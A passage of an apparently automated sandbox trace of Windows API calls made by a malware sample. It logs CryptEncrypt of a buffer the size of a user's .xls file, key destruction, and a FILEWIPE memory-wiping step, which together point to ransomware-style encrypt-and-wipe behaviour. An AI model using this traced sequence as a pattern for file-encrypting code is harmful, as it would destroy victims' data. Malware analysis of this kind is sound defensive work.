pdwDataLen=0x6ae220*=0x12580) returned 1 [0034.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0034.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0034.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1be8 [0034.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0034.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0034.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0034.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0034.496] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0034.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0034.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0034.496] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.497] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0034.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0034.497] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0034.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b70 [0034.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0034.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0034.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0034.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0034.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0034.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0034.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0034.497] CharLowerBuffW (in: lpsz="byte[75137]", cchLength=0xb | out: lpsz="byte[75137]") returned 0xb [0034.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac2f0 [0034.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0034.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0034.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0034.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0034.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0034.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0034.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0034.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0034.497] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b70 [0034.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0034.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0034.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0034.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac2f0 [0034.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0034.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0034.500] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.500] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0034.500] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b70 [0034.500] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0034.500] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0034.500] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0034.500] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0034.500] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.500] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0034.500] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0034.500] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0034.501] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.501] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0034.501] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0034.501] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0034.501] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0034.501] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x88ffb0*, pdwDataLen=0x6ae220*=0x12571, dwBufLen=0x12580 | out: pbData=0x88ffb0*, pdwDataLen=0x6ae220*=0x12580) returned 1 [0034.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0034.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0034.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c88 [0034.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0034.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0034.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0034.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0034.502] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0034.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0034.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0034.502] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.502] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0034.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1be8 [0034.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0034.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0034.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b70 [0034.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0034.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0034.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0034.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac2f0 [0034.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0034.502] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0034.504] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0034.504] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0034.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0034.504] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0034.504] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0034.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1be8 [0034.505] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0034.505] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0034.505] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0034.505] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0034.505] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0034.505] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0034.505] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.505] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0034.505] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0034.505] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.505] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.505] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.510] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.510] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.510] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.512] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.512] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.512] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0034.513] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0034.513] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.513] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0034.513] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.513] CryptDestroyKey (hKey=0x7c2280) returned 1 [0034.513] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0034.513] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0034.513] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0034.513] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0034.513] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0034.513] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0034.513] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0034.513] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0034.513] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0034.513] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0034.513] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0034.513] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0034.513] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0034.514] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0034.514] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.514] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0034.514] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.514] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0034.514] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0034.514] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0034.514] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.514] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0034.514] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0034.514] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.514] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.514] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0034.514] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0034.514] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0034.514] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.514] CryptReleaseContext (hProv=0x7d5c40, dwFlags=0x0) returned 1 [0034.514] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.514] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.514] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0034.514] FreeLibrary (hLibModule=0x754b0000) returned 1 [0034.515] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.515] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.515] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.517] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.517] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.518] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.518] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0034.518] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.518] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.519] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76580980, ftCreationTime.dwHighDateTime=0x1d5baac, ftLastAccessTime.dwLowDateTime=0x9d824440, ftLastAccessTime.dwHighDateTime=0x1d5b5f6, ftLastWriteTime.dwLowDateTime=0x9d824440, ftLastWriteTime.dwHighDateTime=0x1d5b5f6, nFileSizeHigh=0x0, nFileSizeLow=0x12571, dwReserved0=0x0, dwReserved1=0x777648, cFileName="2KU7thE4LQT.xls", cAlternateFileName="2KU7TH~1.XLS")) returned 0x7c2240 [0034.519] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0034.519] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.519] CharLowerBuffW (in: lpsz="byte[75121]", cchLength=0xb | out: lpsz="byte[75121]") returned 0xb [0034.519] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.519] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0034.519] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.519] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0034.519] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0034.520] FreeLibrary (hLibModule=0x76b40000) returned 1 [0034.520] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.520] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.520] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.520] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0034.520] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.520] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.520] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.520] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.520] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.520] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.520] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.520] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.520] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.520] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.520] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.520] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.520] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.520] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.520] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.521] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.521] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: 